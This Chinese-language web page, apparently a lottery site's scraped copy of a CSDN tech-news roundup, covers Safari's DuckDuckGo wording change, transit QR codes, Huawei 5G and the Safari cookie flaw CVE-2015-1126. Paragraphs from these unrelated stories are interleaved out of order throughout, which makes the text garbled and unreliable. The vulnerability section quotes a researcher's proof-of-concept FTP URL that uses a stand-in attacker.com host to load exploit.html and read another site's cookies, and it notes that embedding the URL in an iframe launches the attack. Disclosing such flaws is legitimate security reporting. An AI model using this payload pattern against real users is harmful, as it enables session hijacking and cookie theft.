Safari网页文字表述有偏差,极客头条
分类:牛彩互联网

原标题:Python术语恐遭强制修改;苹果Safari曝漏洞;华为提前发布5G手机|极客头条

苹果修改了Safari网页的文字表述,移除了“Safari是唯一内置并提供非追踪搜索引擎DuckDuckGo的浏览器”的字样。

「CSDN 极客头条」,是从 CSDN 网站延伸至官方微信公众号的特别栏目,专注于一天业界事报道。风里雨里,我们将每天为朋友们,播报最新鲜有料的新闻资讯,让所有技术人,时刻紧跟业界潮流。

讯,本周早些时候,苹果修改了 Safari 网页的文字表述,移除了“Safari 是唯一内置并提供非追踪搜索引擎 DuckDuckGo 的浏览器”的表述。苹果 2014 年 10 月在官网中加入了这句表述,直到当地时间本周四才进行了修改。

存在于Safari浏览器中的一个cookie访问漏洞(CVE-2015-1126)可能会影响数十亿苹果产品,如果你在使用Safari浏览器,一定要尽快检测它是否受该漏洞影响,若受影响请尽快修复。

快讯速知

牛彩彩票官网 1

牛彩彩票官网 2

  • 北京试运行腾讯乘车码,5000余辆公交可刷码乘车
  • 华为:完成5G网络最重要测试,5G手机将提前发布
  • 蚂蚁金服成立小程序事业部,半年内向个人开发者开放
  • 全球移动宽带用户年底将达44亿,比三年前增加11亿
  • 韩国要求谷歌、Facebook、Netflix必须在韩安装服务器
  • 特斯拉新功能:电量不足时,推送到用户手机
  • 微软Edge和苹果Safari浏览器曝漏洞,可致用户访问到虚假网站
  • Facebook推出新AI系统:有助检测仇恨言论
  • Chrome OS现已原生支持Windows文件分享功能
  • Android快速框架 ZBLibrary18.3发布,自动生成请求代码
  • Python 术语 master-slave 恐遭强制修改

官网之前的表述:例如,这是唯一提供 DuckDuckGo 的浏览器-一个不会追踪你的搜索引擎-内置可选。

科普:cookie

国内要闻

牛彩彩票官网,官网现在的表述:例如,Safari 可以让你选择使用 DuckDuckGo 进行互联网搜索-一个不会追踪你的搜索引擎-内置可选。

Cookie,有时也用其复数形式Cookies,指某些网站为了辨别用户身份、进行session跟踪而储存在用户本地终端上的数据(通常经过加密)。Cookie可以保持登录信息到用户下次与服务器的会话,即下次访问同一网站时,用户不必再次输入用户名和密码就可以登录。

北京试运行腾讯乘车码,5000余辆公交可刷码乘车

有消息指出苹果之所以作出这个改变是为了回应英国广告标准局之前接到的广告误导投诉。苹果官网的文字表述之所以被投诉是因为从 2012 年和 2014 年 11 月开始,Tor 和 Firefox 浏览器就陆续提供 DuckDuckGo 作为内置的选项了。

Cookies最典型的应用是判定注册用户是否已经登录网站,用户可能会得到提示,是否在下一次进入此网站时保留用户信息以便简化登录手续,这些都是Cookies的功用。另一个重要应用场合是“购物车”之类处理,用户可能会在一段时间内在同一家网站的不同页面中选择不同的商品,这些信息都会写入Cookies,以便在最后付款时提取信息。

牛彩彩票官网 3

目前美国、英国、澳大利亚、加拿大、新加坡以及其它英语为主的国家的 Safari 网页文字表述已经进行了修改。

漏洞详情

使用示意图

苹果和英国广告标准局的“故事”由来已久,2008 年一则 iPhone 电视广告就曾经被禁。

前段时间,芬兰一家公司Klikki Oy的安全研究员Jouko Pynnönen发现了Safari浏览器中存在安全漏洞(CVE-2015-1126),该漏洞可能会影响数十亿苹果产品。该跨域漏洞会影响Safari的URL文件传输机制,攻击者可以精心制作一个web网页,当受害者访问该页面时,就可以绕过一些正常的跨域限制,然后访问或操作任何网站的HTTP cookies。

今天,腾讯官方微博宣布,从今天开始,腾讯乘车码在北京公交试运行上线。

Pynnönen在一份安全报告中写道:

据悉,腾讯乘车码支持通州、昌平、顺义、密云、大兴、平谷等区域500余条公交线路5000余辆公交车。

 “攻击者可以精心编制一个web页面,当目标网民访问该页面时,攻击者就可以绕过一些正常的跨域限制从而访问或操作任何网站的HTTP cookies。大多数允许用户登录的网站都会在cookies中存储它们的认证信息(通常是会话ID等信息),攻击者访问这些cookies就可以劫持认证会话。在iOS、OS X和Windows系统上所有Safari的测试版本都受该漏洞影响,产品总量可能达到十亿数量级。”

用户首次使用腾讯乘车码,通过微信小程序搜索“腾讯乘车码”,定位到北京市开通乘车码后,“北京一卡通”电子卡,就会自动加入微信卡包。

研究人员解释道,iOS 8.1、6.1.6及OS X 10.9.3和Windows8.1系统上的7.0.4和5.1.7版本的Safari浏览器都受到该漏洞的影响。

再次使用时,只需打开微信下拉聊天框,打开“腾讯乘车码”小程序,或通过“我-卡包-会员卡”即可使用。

牛彩彩票官网 4

华为:完成5G网络最重要测试,5G手机将提前发布

漏洞PoC URL

近日,华为宣布,已完成5G网络最重要测试,首款5G手机,会提前到明年六月之前就发布。

目前针对此漏洞,在URL中的用户名或密码字段编码特殊字符就可能引发安全问题,示例链接如下所示。

华为宣布,在IMT-2020(5G) 推进组组织的中国5G技术研发试验第三阶段测试中,华为率先完成基于3GPP的5G SA(standalone,独立组网)C-Band基站设备功能测试。

ftp://user:password@host/path

工信部之前表示,2020年5G网络将在国内商用,而在正式商用前,终端厂商早已开始忙着测试。按照目前的进度来看,华为将会是国内首个提供5G基带、处理器的芯片厂商,同时他们应该也会是最先推出5G手机的。

当用户名或密码字段中包含编码的特殊字符时,通过操作该URL,攻击者可以下载目标网站的文档资料。Pynnönen还提供了下面的示例PoC URL:

蚂蚁金服成立小程序事业部,半年内向个人开发者开放

ftp://user%40attacker.com%2Fexploit.html%23@apple.com/

牛彩彩票官网 5

当受害者访问该URL时,存在此漏洞的Safari浏览器会加载攻击者所控制网站attacker.com上的exploit.html文件,之后攻击者便会利用JavaScript访问和操作apple.com网站的cookies。受影响的浏览器会将上面URL解码成如下形式:

今天,蚂蚁金服宣布,正式成立小程序事业部、并开放支付成功页入口,全面对接阿里生态。此外,该事业部还将在未来3年内,投入10亿元创新基金,帮助开发者和商家,升级服务场景。

ftp://user@attacker.com/exploit.html#apple.com/

支付宝官方团队还透露,未来半年内,支付宝小程序,将逐步向个人开发者开放。

即在一个正常的web页面中嵌入指向一个FTP URL的IFRAME,这样就可以发起攻击了。

本文由牛彩彩票官网发布于牛彩互联网,转载请注明出处:Safari网页文字表述有偏差,极客头条

上一篇:全美在线,北京国家图书馆 下一篇:没有了
猜你喜欢
热门排行
精彩图文